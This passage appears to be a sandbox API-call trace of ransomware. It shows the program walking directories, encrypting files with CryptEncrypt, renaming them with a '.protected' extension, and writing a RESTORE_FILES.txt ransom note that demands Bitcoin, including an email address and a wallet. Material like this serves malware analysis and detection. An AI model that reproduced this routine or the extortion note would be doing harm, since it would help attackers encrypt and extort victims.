Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0050.363] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.363] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0050.363] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.363] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0050.363] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.363] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0050.363] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x648, lpOverlapped=0x0) returned 1 [0050.518] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.518] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x648, lpOverlapped=0x0) returned 1 [0050.518] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0050.519] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0050.519] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0050.519] CloseHandle (hObject=0xb4) returned 1 [0050.519] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0050.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0050.520] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0050.520] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0050.520] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0050.520] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0050.520] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0050.520] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0050.521] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0050.521] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0050.521] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0050.521] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0050.521] CloseHandle (hObject=0xa4) returned 1 [0050.521] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0050.521] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0050.521] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0050.521] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0050.522] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0050.522] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0050.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned 66 [0050.522] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0050.522] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0050.522] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*") returned 68 [0050.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0051.359] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0051.359] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0051.359] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.") returned 68 [0051.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.359] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0051.359] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0051.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.359] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0051.359] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0051.359] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0051.359] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0051.359] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0051.359] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0051.359] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0051.359] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..") returned 69 [0051.359] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0051.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.359] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0051.359] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0051.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.359] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0051.359] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0051.359] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Windows") returned -1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Program Files") returned -1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Program Files (x86)") returned -1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="$Recycle.bin") returned 1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="System Volume Information") returned -1 [0051.360] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".protected") returned 0x0 [0051.360] lstrcmpW (lpString1="OutlkLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0051.360] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.360] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.360] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0051.360] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrW (lpFirst="OutlkLR.cab", lpSrch=".txt") returned 0x0 [0051.360] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrW (lpFirst="OutlkLR.cab", lpSrch=".rar") returned 0x0 [0051.360] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrW (lpFirst="OutlkLR.cab", lpSrch=".zip") returned 0x0 [0051.360] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0051.418] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.418] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0051.418] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0051.418] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0051.431] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0051.431] CloseHandle (hObject=0xb4) returned 1 [0051.801] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.protected") returned 88 [0051.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.protected")) returned 1 [0051.801] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Windows") returned -1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Program Files") returned -1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Program Files (x86)") returned -1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="$Recycle.bin") returned 1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="System Volume Information") returned -1 [0051.801] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.801] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".protected") returned 0x0 [0051.801] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0051.801] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.801] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.801] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0051.802] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.802] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".txt") returned 0x0 [0051.802] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.802] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".rar") returned 0x0 [0051.802] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.802] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".zip") returned 0x0 [0051.802] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.141] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.141] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.142] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.142] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.579] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.580] CloseHandle (hObject=0xb4) returned 1 [0052.706] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.protected") returned 91 [0052.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.protected")) returned 1 [0052.707] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Windows") returned -1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Program Files") returned -1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Program Files (x86)") returned -1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="$Recycle.bin") returned 1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="System Volume Information") returned -1 [0052.707] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".protected") returned 0x0 [0052.707] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0052.707] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.707] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.707] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0052.707] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".txt") returned 0x0 [0052.707] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".rar") returned 0x0 [0052.707] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".zip") returned 0x0 [0052.707] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0xc72, lpOverlapped=0x0) returned 1 [0052.784] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff38e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.784] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0xc72, lpOverlapped=0x0) returned 1 [0052.784] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.784] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.784] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.785] CloseHandle (hObject=0xb4) returned 1 [0052.785] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.protected") returned 91 [0052.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.protected")) returned 1 [0052.786] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0052.786] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0052.786] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0052.786] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0052.786] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0052.786] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0052.786] 